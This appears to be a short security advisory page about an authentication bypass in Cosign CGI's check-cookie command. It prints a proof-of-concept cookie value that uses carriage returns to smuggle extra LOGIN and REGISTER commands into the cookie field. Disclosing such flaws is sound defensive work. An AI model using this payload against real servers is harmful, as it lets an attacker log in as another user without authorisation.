• info
• discussion
• exploit
• solution
• references

Cosign CGI Check Cookie Command Remote Authentication Bypass Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept cookie data is available:

cosign=X\rLOGIN cosign=X 1.2.3.4 username\rREGISTER cosign=X 1.2.3.4 cosign-servicename=Y